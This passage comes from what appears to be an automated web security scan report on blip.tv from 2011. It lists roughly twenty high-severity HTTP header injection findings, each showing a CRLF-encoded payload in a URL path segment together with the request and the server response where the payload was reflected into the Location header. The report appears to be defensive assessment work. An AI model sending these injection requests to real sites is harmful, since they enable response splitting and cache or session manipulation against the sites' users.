<p>The document has moved <a href="http://www.blip.tv/file/e5932
be8481e9c38/Armc
...[SNIP]...

2.101. http://blip.tv/file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-NeutrogenaSailingEscapingTheMed718.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 86269%0d%0a1601b24ec93 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/86269%0d%0a1601b24ec93 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/86269
1601b24ec93

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:24 GMT
X-Varnish: 344226548
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/86269
1601b24ec93"
...[SNIP]...

2.102. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76864%0d%0aee373237688 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76864%0d%0aee373237688/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/76864
ee373237688
/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 366
Date: Thu, 20 Jan 2011 00:38:03 GMT
X-Varnish: 344223896
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/76864
ee373237688/get/Armch
...[SNIP]...

2.103. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e9027%0d%0aae40af891ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/e9027%0d%0aae40af891ce/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/e9027
ae40af891ce
/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4
Content-Type: text/html; charset=iso-8859-1
Content-Length: 367
Date: Thu, 20 Jan 2011 00:38:03 GMT
X-Varnish: 1274878586
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/e9027
ae40af891ce/Armc
...[SNIP]...

2.104. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam598.mp4

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 99974%0d%0a00d5354d6be was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/99974%0d%0a00d5354d6be HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/99974
00d5354d6be

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:04 GMT
X-Varnish: 1274878615
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/99974
00d5354d6be"
...[SNIP]...

2.105. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload f0c72%0d%0a15d58a252b3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /f0c72%0d%0a15d58a252b3/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/f0c72
15d58a252b3
/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 351
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 1025263364
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/f0c72
15d58a252b3/get/Armch
...[SNIP]...

2.106. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload eaa8a%0d%0a161c1066545 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/eaa8a%0d%0a161c1066545/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/eaa8a
161c1066545
/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 352
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 344223635
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/eaa8a
161c1066545/Armc
...[SNIP]...

2.107. http://blip.tv/file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/ArmchairMango-SundogSeaCart30FtLauderdaleToKeyWest2011DeckCam785.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 6c793%0d%0a57e116ecbd8 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/6c793%0d%0a57e116ecbd8 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/6c793
57e116ecbd8

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:01 GMT
X-Varnish: 1498213384
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/6c793
57e116ecbd8"
...[SNIP]...

2.108. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload c0c6e%0d%0a5695b90a4f3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /c0c6e%0d%0a5695b90a4f3/get/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/c0c6e
5695b90a4f3
/get/Askaninja-AskANinja011811ThatGlow264.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1248903625
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/c0c6e
5695b90a4f3/get/Askan
...[SNIP]...

2.109. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 79c8b%0d%0a3360beab2ff was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/79c8b%0d%0a3360beab2ff/Askaninja-AskANinja011811ThatGlow264.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/79c8b
3360beab2ff
/Askaninja-AskANinja011811ThatGlow264.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 1324525882
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/79c8b
3360beab2ff/Aska
...[SNIP]...

2.110. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow264.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow264.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f97c7%0d%0ac3998e3c9c1 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f97c7%0d%0ac3998e3c9c1 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/f97c7
c3998e3c9c1

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 1248903716
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f97c7
c3998e3c9c1"
...[SNIP]...

2.111. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d02bd%0d%0a897d9453cba was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d02bd%0d%0a897d9453cba/get/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/d02bd
897d9453cba
/get/Askaninja-AskANinja011811ThatGlow990.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 338
Date: Thu, 20 Jan 2011 00:38:16 GMT
X-Varnish: 344225551
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/d02bd
897d9453cba/get/Askan
...[SNIP]...

2.112. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload feabf%0d%0a25bd50cd6ce was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/feabf%0d%0a25bd50cd6ce/Askaninja-AskANinja011811ThatGlow990.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/feabf
25bd50cd6ce
/Askaninja-AskANinja011811ThatGlow990.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 339
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 344225596
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/feabf
25bd50cd6ce/Aska
...[SNIP]...

2.113. http://blip.tv/file/get/Askaninja-AskANinja011811ThatGlow990.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/Askaninja-AskANinja011811ThatGlow990.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload dca07%0d%0a649df3a9a60 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/dca07%0d%0a649df3a9a60 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/dca07
649df3a9a60

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:17 GMT
X-Varnish: 344225641
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/dca07
649df3a9a60"
...[SNIP]...

2.114. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5804c%0d%0a532d4bcc642 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5804c%0d%0a532d4bcc642/get/CookingUpAStory-FoodSwap163.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/5804c
532d4bcc642
/get/CookingUpAStory-FoodSwap163.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:07 GMT
X-Varnish: 344224386
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/5804c
532d4bcc642/get/Cooki
...[SNIP]...

2.115. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload df1c2%0d%0a2b7c3d78fd0 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/df1c2%0d%0a2b7c3d78fd0/CookingUpAStory-FoodSwap163.m4v HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/df1c2
2b7c3d78fd0
/CookingUpAStory-FoodSwap163.m4v
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330
Date: Thu, 20 Jan 2011 00:38:08 GMT
X-Varnish: 1324524791
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/df1c2
2b7c3d78fd0/Cook
...[SNIP]...

2.116. http://blip.tv/file/get/CookingUpAStory-FoodSwap163.m4v [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap163.m4v

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload f734d%0d%0a484345946d9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/f734d%0d%0a484345946d9 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/file/get/f734d
484345946d9

Content-Type: text/html; charset=iso-8859-1
Content-Length: 287
Date: Thu, 20 Jan 2011 00:38:08 GMT
X-Varnish: 1248902543
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/f734d
484345946d9"
...[SNIP]...

2.117. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload e6f6e%0d%0aa39ef88da9f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /e6f6e%0d%0aa39ef88da9f/get/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache
Location: http://www.blip.tv/e6f6e
a39ef88da9f
/get/CookingUpAStory-FoodSwap232.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 314
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1025264601
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/e6f6e
a39ef88da9f/get/Cooki
...[SNIP]...

2.118. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 979b1%0d%0aec06ebaac61 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /file/979b1%0d%0aec06ebaac61/CookingUpAStory-FoodSwap232.mp3 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/979b1
ec06ebaac61
/CookingUpAStory-FoodSwap232.mp3
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1274879521
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/979b1
ec06ebaac61/Cook
...[SNIP]...

2.119. http://blip.tv/file/get/CookingUpAStory-FoodSwap232.mp3 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap232.mp3

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload ac814%0d%0a304968691f9 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /file/get/ac814%0d%0a304968691f9 HTTP/1.1
Host: blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: tab_state=blog; __utmz=3555683.1295482483.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=3555683.1049568792.1295482483.1295482483.1295482483.1; __utmc=3555683; __qca=P0-535727044-1295482483262; __utmb=3555683.1.10.1295482483;

Response

HTTP/1.1 302 Found
Server: Apache/2.2.3 (CentOS)
Location: http://www.blip.tv/file/get/ac814
304968691f9

Content-Type: text/html; charset=iso-8859-1
Content-Length: 302
Date: Thu, 20 Jan 2011 00:38:11 GMT
X-Varnish: 1025264681
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.blip.tv/file/get/ac814
304968691f9"
...[SNIP]...

2.120. http://blip.tv/file/get/CookingUpAStory-FoodSwap596.m4v [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blip.tv
Path:   /file/get/CookingUpAStory-FoodSwap596.m4v

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 74695%0d%0aea4dd8038a4 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

